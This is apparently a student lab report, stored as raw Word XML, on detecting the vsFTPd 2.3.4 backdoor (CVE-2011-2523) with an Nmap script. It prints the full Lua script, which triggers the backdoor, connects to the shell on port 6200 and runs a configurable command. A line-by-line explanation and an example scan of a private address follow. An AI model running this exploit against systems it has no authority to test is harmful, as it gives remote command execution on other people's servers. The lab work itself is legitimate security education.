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F4F" w:rsidRPr="00E11C82" w:rsidRDefault="00B02F4F" w:rsidP="00B02F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C82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FINDING VSFTPD VULNERABILITY USING NSE IN NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02F4F" w:rsidRPr="00E11C82" w:rsidRDefault="00B02F4F" w:rsidP="00B02F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2F4F" w:rsidRDefault="00B02F4F" w:rsidP="007B1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C82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:rsidR="007B1663" w:rsidRPr="007B1663" w:rsidRDefault="007B1663" w:rsidP="007B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7B1663">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ests to see whether the vsFTPd 2.3.4 backdoor, which was discovered on 2011-07-04 (CVE-2011-2523), is present. By default, this script tries to open a backdoor by utilising the harmless id command, however an exploit can modify that.script parameters for the ftp-vsftpd-backdoor.cmd or cmd.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E11C82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Script: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ftp = require "ftp"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nmap = require "nmap"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shortport = require "shortport"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stdnse = require "stdnse"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string = require "string"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table = require "table"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vulns = require "vulns"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categories = {"exploit", "intrusive", "malware", "vuln"}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CMD_FTP = "USER X:)\r\nPASS X\r\n"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CMD_SHELL_ID = "id"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portrule = function (host, port)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if port.version.product ~= nil and port.version.product ~= "vsftpd" then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return false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if port.version.version ~= nil and port.version.version ~= "2.3.4" then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return false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return shortport.port_or_service(21, "ftp")(host, port)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function finish_ftp(socket, status, message)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if socket then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socket:close()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return status, message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lastRenderedPageBreak/>
        <w:t>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local function check_backdoor(host, shell_cmd, vuln)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socket = nmap.new_socket("tcp")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socket:set_timeout(10000)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status, ret = socket:connect(host, 6200, "tcp")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if not status then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return finish_ftp(socket, false, "can't connect to tcp port 6200")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status, ret = socket:send(CMD_SHELL_ID.."\n")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status, ret = socket:receive_lines(1)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vuln.state = vulns.STATE.EXPLOIT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result = string.gsub(ret, "^%s*(.-)\n*$", "%1")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table.insert(vuln.exploit_results,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string.format("Results: %s", result))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socket:send("exit\n");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return finish_ftp(socket, true)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action = function(host, port)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cmd = stdnse.get_script_args("ftp-vsftpd-backdoor.cmd") or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stdnse.get_script_args("exploit.cmd") or CMD_SHELL_ID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vsftp_vuln = {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title = "vsFTPd version 2.3.4 backdoor",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IDS = {CVE = 'CVE-2011-2523', BID = '48539'},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  exploit_results = {},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}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report = vulns.Report:new(SCRIPT_NAME, host, port)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status, ret = check_backdoor(host, cmd, vsftp_vuln)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local sock, code, message, buffer = ftp.connect(host, port,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  {request_timeout = 8000})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status, ret = sock:send(CMD_FTP .. "\r\n")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stdnse.sleep(1)  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status, ret = check_backdoor(host, cmd, vsftp_vuln)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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  sock:close()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 return report:make_output(vsftp_vuln)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end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C82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 xml:space="preserve"> Nmap --Script(scriptname) Target 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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11C82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(eg: nmap --script eample4.nse 192.168.128.131)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02F4F" w:rsidRPr="00E11C82" w:rsidRDefault="00B02F4F" w:rsidP="00B02F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C82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ftp = require "ftp": Loads the ftp library module that provides a set of functions for working with the File Transfer Protocol (FTP).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nmap = require "nmap": Loads the nmap library module that provides a set of functions for interacting with Nmap, such as creating new sockets, retrieving information about the target host, and other utility functions.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shortport = require "shortport": Loads the shortport library module that provides a set of port rule functions for quickly checking if a given host and port are valid targets.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stdnse = require "stdnse": Loads the stdnse library module that provides a set of standard NSE functions, including get_script_args() for retrieving arguments passed to the script, sleep() for pausing script execution, and others.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string = require "string": Loads the built-in string library module that provides a set of functions for working with strings.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table = require "table": Loads the built-in table library module that provides a set of functions for working with Lua tables.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vulns = require "vulns": Loads the vulns library module that provides a set of functions for working with vulnerability scanning results.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categories = {"exploit", "intrusive", "malware", "vuln"}: Defines the categories for this NSE script, which are used to group scripts in the Nmap Scripting Engine.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CMD_FTP = "USER X:)\r\nPASS X\r\n": Defines the FTP command used to exploit the backdoor in the vsFTPd server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02F4F" w:rsidRPr="00E11C82" w:rsidRDefault="00B02F4F" w:rsidP="00B02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local CMD_SHELL_ID = "id": Defines the shell command used to check if the backdoor exploit was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30117" w:rsidRPr="00E11C82" w:rsidRDefault="00B30117" w:rsidP="00B30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portrule = function (host, port): Defines a port rule function that checks if the target port is running a vulnerable version of the vsFTPd server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30117" w:rsidRPr="00E11C82" w:rsidRDefault="00B30117" w:rsidP="00B30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if port.version.product ~= nil and port.version.product ~= "vsftpd" then: Checks if the product name of the target port matches "vsftpd".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30117" w:rsidRPr="00E11C82" w:rsidRDefault="00B30117" w:rsidP="00B30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if port.version.version ~= nil and port.version.version ~= "2.3.4" then: Checks if the version number of the target port matches "2.3.4".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30117" w:rsidRDefault="00B30117" w:rsidP="00B30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C82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>return shortport.port_or_service(21, "ftp")(host, port): Returns true if the target port is TCP 21 (FTP) and false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7DE2" w:rsidRDefault="00BE7DE2" w:rsidP="00BE7D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7DE2" w:rsidRDefault="00BE7DE2" w:rsidP="00BE7D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7DE2" w:rsidRDefault="00BE7DE2" w:rsidP="00BE7D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7DE2" w:rsidRPr="00BE7DE2" w:rsidRDefault="00BE7DE2" w:rsidP="00BE7D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DE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BE7DE2" w:rsidRPr="00BE7DE2" w:rsidRDefault="00BE7DE2" w:rsidP="00BE7D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979545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="3604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04651" name="Picture 360404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4F" w:rsidRDefault="00B02F4F" w:rsidP="00B02F4F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2F8C" w:rsidRDefault="00FC2F8C" w:rsidP="00B02F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F8C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it Hub</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2F8C"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ink : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2F8C" w:rsidRPr="00FC2F8C" w:rsidRDefault="00FC2F8C" w:rsidP="00B02F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2F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://github.com/sudhan12345345/AEHPT.git</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC2F8C" w:rsidRPr="00FC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4528"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A57A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4F"/>
    <w:rsid w:val="007B1663"/>
    <w:rsid w:val="00B02F4F"/>
    <w:rsid w:val="00B30117"/>
    <w:rsid w:val="00BE7DE2"/>
    <w:rsid w:val="00E11C82"/>
    <w:rsid w:val="00FC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C78"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E2B898F8-FAF6-47FE-A15E-E76EB6BF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2F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N</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sudhan S</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-30T15:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-30T17:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>